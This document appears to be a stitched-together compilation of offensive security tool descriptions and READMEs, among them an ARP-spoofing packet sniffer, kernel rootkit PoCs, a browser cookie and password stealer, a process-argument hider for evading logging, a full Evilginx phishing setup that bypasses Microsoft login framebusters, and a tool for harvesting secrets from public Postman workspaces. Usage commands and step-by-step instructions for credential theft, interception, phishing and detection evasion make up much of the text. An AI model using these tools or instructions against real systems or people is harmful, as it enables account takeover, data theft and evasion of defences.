Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help


  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

  9. Press Ctrl+C in-order to stop the packet interception and write the output to file.


usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET

A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)


A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.


MIT License
Copyright (c) 2024 Josh Schiavone

HackerInfo - Infromations Web Application Security

Infromations Web Application Security

install :

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4

pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h

python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf


Hackerinfo infromations Web Application Security (11)

Library install hackinfo:

sudo python setup.py install
pip3 install hackinfo

C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Actively working on making the backend more reliable

Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
python3 -m pip install -r requirements.txt
python3 tracker.py


I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).


VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.


Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.



All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

Each options require to disable secure boot.


Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.


More PoCs especially about following things will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References

Cookie-Monster - BOF To Steal Browser Cookies & Credentials

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:


Ensure Mingw-w64 and make is installed on the linux prior to compiling.


to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32


  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI


This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI

NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.

Default Cmd:

Windows Event Logs:

Using NoArgs:

Windows Event Logs:

Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:

All the arguemnts are hidden dynamically

Process Monitor View:

Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.


  • https://en.wikipedia.org/wiki/Microsoft_Detours
  • https://github.com/microsoft/Detours
  • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
  • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++

Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.

Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. โ–ถ Watch Video

โ˜•๏ธŽ Buy Me A Coffee

Video Tutorial: ๐Ÿ‘‡


This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.


Video Tutorial

Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:


Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile


go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no


sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:

sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:


Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/


  • Create script(s) to automate most of the steps

Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.


  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams


python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy

Using as a library


p = porchpirate()

Get Workspace Collections

p = porchpirate()

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])

Grabbing a Workspace's Globals

p = porchpirate()

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py

APKDeepLens - Android Security Insights In Full Spectrum

APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.


To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
pip install -r .\requirements.txt
python APKDeepLens.py --help


To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 APKDeepLens.py -apk file.apk -report


We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at

